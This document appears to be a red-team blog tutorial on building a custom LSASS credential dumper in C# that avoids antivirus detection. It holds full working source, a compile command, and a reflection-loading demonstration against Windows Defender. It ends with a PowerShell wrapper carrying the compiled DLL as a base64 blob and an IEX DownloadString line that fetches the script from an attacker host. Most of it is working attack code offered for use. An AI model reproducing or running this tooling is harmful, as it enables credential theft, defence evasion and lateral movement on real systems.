Introduction
After compromising a machine, antivirus software must not detect the Red Team operator's actions. And in the process of moving from a compromised machine to another, it needs to dump credentials. If you're going to use Mimikatz, you will be detected by antivirus. If you don't want to be caught, you have to make your tool. We can do that with the MiniDumpWriteDump function to dump the LSASS process.
LSASS process
Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.
This means that any user logging into the machine will have their credentials stored in the LSASS process.
Custom Code
In dbghelp.dll , there's a function named MiniDumpWriteDump . With MiniDumpWriteDump, we can dump the LSASS process's content into a file to extracting credentials.
The Syntax for MiniDumpWriteDump is:
Copy BOOL MiniDumpWriteDump (
[in] HANDLE hProcess,
[in] DWORD ProcessId,
[in] HANDLE hFile,
[in] MINIDUMP_TYPE DumpType,
[in] PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
[in] PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
[in] PMINIDUMP_CALLBACK_INFORMATION CallbackParam
); Now let’s do our C# code with a bit of help from Pinvoke.
Copy [ DllImport ( "Dbghelp.dll" )]
static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); And we need to OpenProcess function.
Copy HANDLE OpenProcess (
[in] DWORD dwDesiredAccess,
[in] BOOL bInheritHandle,
[in] DWORD dwProcessId
);
Copy [ DllImport ( "kernel32.dll" , SetLastError = true )]
static extern IntPtr OpenProcess ( uint processAccess , bool bInheritHandle , int processId); At this time, we have all the pieces we need. Now let's write the code.
First, we need to get the LSASS process ID.
Copy Process[] lsass = Process.GetProcessesByName("lsass");
int lsassPID = lsass[0].Id; Then, Get a handle on the LSASS process.
Copy IntPtr handle = OpenProcess(0x001F0FFF, false, lsassPID); After that, Dump LSASS process’s content to file.
Copy string filePath = args[0];
FileStream dumpFile = new FileStream(filePath, FileMode.Create);
bool dumped = MiniDumpWriteDump(handle, lsassPID, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); The finally block.
Copy using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace dumper
{
public class Program
{
[DllImport("Dbghelp.dll")]
static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
[DllImport("kernel32.dll")]
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
public static void Main(string[] args)
{
Process[] lsass = Process.GetProcessesByName("lsass");
int lsassPID = lsass[0].Id;
IntPtr handle = OpenProcess(0x001F0FFF, false, lsassPID);
string filePath = args[0];
FileStream dumpFile = new FileStream(filePath, FileMode.Create);
var dumped = MiniDumpWriteDump(handle, lsassPID, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
}
}
} Compile it
Now we can compile it with CSC as DLL.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /target:library /out:dumper.dll dump.cs
After compiling the source code, Let's check now whether any antivirus catches the tool or not.
As shown in the results, it is detected by no one! Awesome.
Test Time with Defender
As we have a DLL file, we can run it directly from Powershell via Reflection.Assembly .
First, load the DLL file.
Copy [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\dumper.dll")) Then, run it.
Copy [dumper.Program]::Main('C:\users\tester\desktop\l5455.dmp')
ls 'C:\users\tester\desktop\l5455.dmp' We managed to dump the LSASS process and bypass Windows Defender.
Last Move
We can make a PowerShell script to dump the LSASS process with DLL reflection.
Copy function LSASS-Dumper
{
Param(
[Parameter(Mandatory = $false, Position = 0)]
[string]$Path)
if ($Path)
{
[System.Reflection.Assembly]::Load([Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAC5z32EAAAAAAAAAAOAAAiELAQsAAAgAAAAGAAAAAAAALiYAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANQlAABXAAAAAEAAAKACAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAANAYAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKACAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAQJgAAAAAAAEgAAAACAAUAvCAAABgFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwBwBVAAAAAQAAEQByAQAAcCgEAAAKCgYWmm8FAAAKCyD/Dx8AFgcoAgAABgwCFpoNCRhzBgAAChMECAcRBG8HAAAKbwgAAAoYfgkAAAp+CQAACn4JAAAKKAEAAAYTBSoeAigKAAAKKgAAAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAMQBAAAjfgAAMAIAAEQCAAAjU3RyaW5ncwAAAAB0BAAAEAAAACNVUwCEBAAAEAAAACNHVUlEAAAAlAQAAIQAAAAjQmxvYgAAAAAAAAACAAABRxUCFAkAAAAA+iUzABYAAAEAAAAKAAAAAgAAAAQAAAALAAAACgAAAAIAAAABAAAAAgAAAAIAAAABAAAAAgAAAAAACgABAAAAAAAGADQALQAGAP8A3wAGAB8B3wAGAFwBPQEKAJsBiAEGAMcBvQEGANIBvQEGAPcB2wEGABkCPQEGADcCLQAAAAAAAQAAAAAAAQABAAEAEAAVAB0ABQABAAEAAAAAAIAAkSA7AAoAAQAAAAAAgACRIE0AFQAIAFAgAAAAAJYAWQAcAAsAsSAAAAAAhhheACIADAAAAAEAZAAAAAIAbQAAAAMAdwAAAAQAfQAAAAUAhgAAAAYAlQAAAAcApQAAAAEAswAAAAIAwQAAAAMA0AAAAAEA2gARAF4AJgAZAF4AIgAhAF4AKwApAKMBMAApALYBNwAxAF4AOwAxAAYCQgBJACQCRwBRAD4CSwAJAF4AIgAuAAsAWgAuABMAYwBOAG8BewEAAQMAOwABAAABBQBNAAIABIAAAAAAAAAAAAAAAAAAAAAAHQAAAAQAAAAAAAAAAAAAAAEAJAAAAAAABAAAAAAAAAAAAAAAAQAtAAAAAAAAAAAAADxNb2R1bGU+AGR1bXBlci5kbGwAUHJvZ3JhbQBkdW1wZXIAbXNjb3JsaWIAU3lzdGVtAE9iamVjdABNaW5pRHVtcFdyaXRlRHVtcABPcGVuUHJvY2VzcwBNYWluAC5jdG9yAGhQcm9jZXNzAFByb2Nlc3NJZABoRmlsZQBEdW1wVHlwZQBFeGNlcHRpb25QYXJhbQBVc2VyU3RyZWFtUGFyYW0AQ2FsbGJhY2tQYXJhbQBwcm9jZXNzQWNjZXNzAGJJbmhlcml0SGFuZGxlAHByb2Nlc3NJZABhcmdzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMARGxsSW1wb3J0QXR0cmlidXRlAERiZ2hlbHAuZGxsAGtlcm5lbDMyLmRsbABTeXN0ZW0uRGlhZ25vc3RpY3MAUHJvY2VzcwBHZXRQcm9jZXNzZXNCeU5hbWUAZ2V0X0lkAFN5c3RlbS5JTwBGaWxlU3RyZWFtAEZpbGVNb2RlAE1pY3Jvc29mdC5XaW4zMi5TYWZlSGFuZGxlcwBTYWZlRmlsZUhhbmRsZQBnZXRfU2FmZUZpbGVIYW5kbGUAU2Fm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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==")) | Out-Null
[dumper.Program]::Main($Path)
}
else
{
Write-Warning '- Enter the path!'
Write-Warning '[Example] LSASS-Dumper -Path C:\windows\temp\dump.log'
}
} You can import the LSASS-Dumper function and run it.
Copy Import-Module .\script.ps1
# Or
IEX (New-Object Net.WebClient).DownloadString('http://YourIP/script.ps1')
LSASS-Dumper -Path C:\windows\temp\dump.log 
